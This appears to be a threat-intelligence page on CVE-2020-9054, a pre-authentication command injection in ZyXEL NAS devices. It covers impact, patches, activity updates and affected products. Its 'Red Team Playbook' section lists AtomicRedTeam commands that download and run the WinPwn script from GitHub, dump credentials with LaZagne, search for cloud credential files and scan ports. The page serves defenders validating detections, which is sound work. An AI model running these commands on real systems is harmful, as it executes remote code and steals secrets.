CVE-2020-9054
Overview
This vulnerability is a pre-authentication command injection affecting ZyXEL NAS devices' weblogin.cgi CGI executable. The root cause is improper sanitization of the username parameter passed to weblogin.cgi, allowing injection of shell commands. The flaw resides in the web server component that processes authentication requests, enabling command execution within the web server's privilege context.
Vulnerability Description
Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. ZyXEL NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the ZyXEL device. Although the web server does not run as the root user, ZyXEL devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable ZyXEL device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any ZyXEL device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2
Impact
An unauthenticated remote attacker can execute arbitrary commands with root privileges on affected ZyXEL NAS devices. This enables full system compromise, including data theft, device manipulation, or persistent backdoors. No user interaction or authentication is required, and exploitation can occur remotely if the device is exposed or indirectly reachable via client systems. The vulnerability can lead to complete loss of confidentiality, integrity, and availability of the device and stored data.
Solution
ZyXEL has released firmware updates addressing this vulnerability in versions 5.21(AAZF.7)C0 for NAS326, 5.21(AASZ.3)C0 for NAS520, 5.21(AATB.4)C0 for NAS540, and 5.21(ABAG.4)C0 for NAS542. Users should upgrade to these firmware versions immediately. Detailed patch instructions and advisories are available at ZyXEL's official support page: https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml. End-of-support models are not receiving updates and should be replaced or isolated from networks.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical pre-authentication command injection vulnerability exists in multiple ZyXEL network-attached storage (NAS) devices running specific firmware versions. This flaw arises from inadequate sanitization of the username parameter in the weblogin.cgi CGI executable. An attacker can exploit this vulnerability by crafting malicious HTTP requests that include specially formatted characters in the username field. The web server, which operates with limited privileges, can inadvertently execute arbitrary commands due to the presence of a setuid utility on the device. This utility allows the execution of commands with root privileges, thereby escalating the attacker's access level and potentially compromising the entire device.
Exploitation of this vulnerability can occur through various attack vectors. A remote, unauthenticated attacker can directly connect to a vulnerable device if it is exposed to the internet. However, the attack can also be executed indirectly; for instance, by manipulating web traffic or leveraging cross-site scripting (XSS) vulnerabilities on a third-party website that interacts with the ZyXEL devices. In such scenarios, merely visiting a compromised site could trigger the crafted requests, leading to the exploitation of any reachable ZyXEL NAS device. This versatility in attack vectors significantly increases the risk of exploitation, as it broadens the potential attack surface beyond direct access to the vulnerable devices.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on ZyXEL NAS devices for data storage and management. Successful exploitation could lead to unauthorized access to sensitive data, loss of integrity, and disruption of services. The ability to execute arbitrary code with root privileges means that an attacker could manipulate system configurations, install malware, or exfiltrate confidential information. For businesses, the consequences could include reputational damage, financial losses, and regulatory penalties, especially if sensitive customer data is compromised. The high CVSS score of 9.8 underscores the severity of the threat and the urgent need for remediation.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest versions provided by ZyXEL is crucial, as these updates often contain patches for known vulnerabilities. Additionally, network segmentation can help limit exposure by isolating vulnerable devices from the internet and reducing the attack surface. Employing intrusion detection systems (IDS) can aid in identifying unusual traffic patterns indicative of exploitation attempts. Organizations should also conduct routine security assessments and vulnerability scans to ensure that all devices are properly configured and up to date.
In conclusion, the command injection vulnerability in ZyXEL NAS devices poses a significant threat to both individual users and organizations. The potential for remote code execution with root privileges highlights the critical need for immediate action. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities. Implementing robust detection and mitigation strategies will not only protect sensitive data but also enhance overall cybersecurity posture in an increasingly complex threat landscape.
CSURFACE threat intelligence has detected a slight increase in activity exploiting CVE-2020-9054, indicating continued interest from threat actors targeting ZyXEL NAS devices. Although the overall exploitability score remains stable, this subtle rise in telemetry suggests that adversaries may be probing vulnerable systems more frequently or refining their attack methods. The availability of publicly accessible proof-of-concept code continues to lower the barrier for exploitation, potentially expanding the pool of attackers capable of leveraging this command injection flaw. While there is no current evidence of ransomware groups adopting this vulnerability, the persistent exploitation attempts underscore the ongoing risk to organizations relying on affected ZyXEL firmware versions. Consequently, the threat level remains critical, with a sustained potential for remote code execution that could lead to significant operational disruption or data compromise.
Update 2 — June 07, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting the CVE-2020-9054 vulnerability in ZyXEL NAS devices. While the overall trend remains stable, this uptick suggests persistent attacker interest and ongoing probing of vulnerable systems. The availability of publicly accessible proof-of-concept code continues to facilitate exploitation efforts by lowering technical barriers, which may contribute to the sustained activity observed in our telemetry. Although there is still no confirmed linkage to ransomware campaigns, the consistent exploitation attempts underscore the vulnerability’s enduring appeal as a vector for remote code execution. This development maintains the threat level at critical, emphasizing the need for continued vigilance given the potential for operational disruption or data compromise stemming from successful attacks.
Update 3 — June 15, 2026
CSURFACE threat intelligence has detected a notable surge in exploitation attempts targeting the CVE-2020-9054 vulnerability in ZyXEL NAS devices. This increase is reflected in a rising trend of telemetry signals and a near-maximal EPSS score, indicating heightened likelihood of successful exploitation in the wild. The persistence of publicly available proof-of-concept code continues to lower the technical barriers for attackers, sustaining adversary interest and activity. Although there remains no confirmed association with ransomware campaigns, the escalation in exploitation attempts underscores the vulnerability’s ongoing attractiveness as a remote code execution vector. This development elevates the urgency for defenders to maintain heightened monitoring and response capabilities, as the risk of operational disruption or data compromise remains critically high.
Update 4 — July 05, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2020-9054, indicating sustained adversary interest in this critical ZyXEL NAS vulnerability. While the overall trend remains stable, the modest uptick in activity suggests that threat actors continue to probe for vulnerable devices, leveraging publicly available proof-of-concept code to facilitate remote code execution. This persistence underscores the vulnerability’s enduring appeal as an attack vector, particularly given its pre-authentication nature and high severity rating. Although there is still no confirmed linkage to ransomware campaigns, the ongoing exploitation attempts maintain a heightened risk posture for affected organizations. Consequently, defenders should recognize that the threat level remains critically high, with adversaries actively seeking to exploit this flaw to gain unauthorized access and potentially disrupt operations or exfiltrate data.
Affected Products (27)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Nas326 Firmware | All |
cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Nas520 Firmware | All |
cpe:2.3:o:zyxel:nas520_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Nas540 Firmware | All |
cpe:2.3:o:zyxel:nas540_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Nas542 Firmware | All |
cpe:2.3:o:zyxel:nas542_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp100 Firmware | All |
cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp200 Firmware | All |
cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp500 Firmware | All |
cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp800 Firmware | All |
cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg20-Vpn Firmware | All |
cpe:2.3:o:zyxel:usg20-vpn_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg20w-Vpn Firmware | All |
cpe:2.3:o:zyxel:usg20w-vpn_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg40 Firmware | All |
cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg40w Firmware | All |
cpe:2.3:o:zyxel:usg40w_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg60 Firmware | All |
cpe:2.3:o:zyxel:usg60_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg60w Firmware | All |
cpe:2.3:o:zyxel:usg60w_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg110 Firmware | All |
cpe:2.3:o:zyxel:usg110_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg210 Firmware | All |
cpe:2.3:o:zyxel:usg210_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg310 Firmware | All |
cpe:2.3:o:zyxel:usg310_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg1100 Firmware | All |
cpe:2.3:o:zyxel:usg1100_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg1900 Firmware | All |
cpe:2.3:o:zyxel:usg1900_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg2200 Firmware | All |
cpe:2.3:o:zyxel:usg2200_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
darrenmartyn/CVE-2020-9054
CVE-2020-9054 PoC for Zyxel
|
darrenmartyn | 3 | 0 | 2021-09-09 | View |
Threat Feed
32 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
58%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
51%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-9054 |
| cwe.mitre.org |
GitHub CVE
x_refsource_MISC
|
https://cwe.mitre.org/data/definitions/78.html |
| zyxel.com |
GitHub CVE
x_refsource_CONFIRM
|
https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml |
| kb.cert.org |
GitHub CVE
third-party-advisory
x_refsource_CERT-VN
|
https://kb.cert.org/vuls/id/498544/ |
| kb.cert.org |
GitHub CVE
x_refsource_MISC
|
https://kb.cert.org/artifacts/cve-2020-9054.html |
| krebsonsecurity.com |
GitHub CVE
x_refsource_MISC
|
https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-9054 |